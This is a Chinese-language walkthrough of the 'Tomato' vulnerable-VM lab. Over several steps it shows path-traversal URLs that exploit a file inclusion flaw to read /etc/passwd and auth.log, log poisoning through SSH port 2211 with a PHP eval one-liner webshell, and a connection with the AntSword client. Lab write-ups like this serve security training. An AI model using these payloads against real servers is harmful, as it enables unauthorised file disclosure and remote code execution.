目录

Tomato-文件包含漏洞靶机-通关攻略

Tomato 文件包含漏洞靶机 通关攻略

下载靶机ova文件,下载地址:

解压导入VMware,修改该虚拟机的网卡模式为NAT模式。

https://i-blog.csdnimg.cn/direct/4d88484f39bd405782a473bfa3ebec31.png

1. 打开虚拟机Tomato

https://i-blog.csdnimg.cn/direct/6f7fe5b93ff6475ea21d907d5a450f8f.png

2. 打开kali,nmap扫描主机,寻找靶机ip

https://i-blog.csdnimg.cn/direct/5d71d9fd723347ee9dd0062e574b5547.png

https://i-blog.csdnimg.cn/direct/3201d034a71f4ebeb4968eed33dde149.png

判断出靶机ip为192.168.182.153,同时ftp 21端口、http 80端口、sun-answerbook 8888端口状态均是开启。

3. 浏览器访问ip以及可利用的端口80 、 8888

ip:80端口

https://i-blog.csdnimg.cn/direct/9b480baa980e494d9fd4632245c6b410.png

ip:8888端口    出现输入框

https://i-blog.csdnimg.cn/direct/bd30c15ae52642de9ebefb360d366ca6.png

4. 使用kali的dirb进行目录扫描

输入:dirb “http://192.168.182.153”

发现 /antibot_image/        index.html          server-status

https://i-blog.csdnimg.cn/direct/f493d31cbda84a4ca88fedbd8a697b05.png

5.依次访问/antibot_image/  、 index.html  、 server-status

发现存在目录

https://i-blog.csdnimg.cn/direct/815401b7dfaf467e8ea919337b1bd3fe.png

https://i-blog.csdnimg.cn/direct/138f5040cc8a4b16bca6fe3d7baa2df1.png

无权限访问

https://i-blog.csdnimg.cn/direct/dd9200059d1c412195f9019b38437eb9.png

6.进一步查看/antibot_image/的目录

发现一个info.php文件

https://i-blog.csdnimg.cn/direct/f13ee505dda74e4f95da91d3df607d42.png

点击info.php文件,发现有PHP信息,显示:Linux系统,/etc/

https://i-blog.csdnimg.cn/direct/4505e615ba234058bb29d60ba6b6503a.png 发现:存在allow_url_fopen On,allow_url_include Off .

https://i-blog.csdnimg.cn/direct/f7d33128b5734342a6c3f262119d7455.png

7.查看 info.php页面的源代码

【allow_url_include Off】,发现include()高危函数,可能存在文件包含漏洞

参数

8.  include通过GET方式传image参数

https://i-blog.csdnimg.cn/direct/ebd9ce97f9c94edbbae3dd1f4eb60baa.png

image参数赋值查看/etc/passwd用户配置文件

根据上图,判断路径为:../../../../../etc/passwd

如果判断不清,可以一层一层往外切,每一个../向上一级切换一层

输入:http://192.168.182.153/antibot_image/antibots/info.php?image=../../../../../etc/passwd

在页面最下方发现,文件内容显示在页面上            则存在文件包含漏洞

https://i-blog.csdnimg.cn/direct/9a5c3683525a4368a09dc758469b6e9b.png

9.利用文件包含漏洞,查看日志文件

输入:http://192.168.182.153/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

https://i-blog.csdnimg.cn/direct/130a09e3dbfe4f0eaa2ebc0c495f83a0.png

10.  查看远程连接ssh端口是否开始

kali,输入:nmap -A -T4 -p- 192.168.182.153

-A:使用所有高级扫描选项

-T4:设置时许,越高扫描越快

-p-:全端口扫描

发现ssh端口是开启的,2211

https://i-blog.csdnimg.cn/direct/07eb98ae9b094adcb1d550976e02ae4c.png

11. 利用远程连接端口ssh 2211和日志记录,写入一句话木马

URL输入:http://192.168.182.153:2211/

再次查看日志:

http://192.168.182.153/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

发现木马:‘GET /%3C?php%20@eval($_POST[%27cmd%27]);?%3E HTTP/1.1’

https://i-blog.csdnimg.cn/direct/73b52c6316f4411d9e6f05a80e415254.png

12. 使用蚁剑连接   查看日志的网址

在查看日志的页面已经写入完整的一句话木马,使用蚁剑进行连接。

https://i-blog.csdnimg.cn/direct/d33ca84e108141f0866a278fa2a6f945.png

https://i-blog.csdnimg.cn/direct/85310b7fc5b149a2a5cf2927a51521e3.png

参考其他技术分享,进行练习

Tomato  文件包含靶机  练习结束

练习中存在一些磕磕绊绊,结果得到的有点曲折。

即使对大家有一点点帮助,

拜拜!                                                                                         ————–2025/3/12   23:21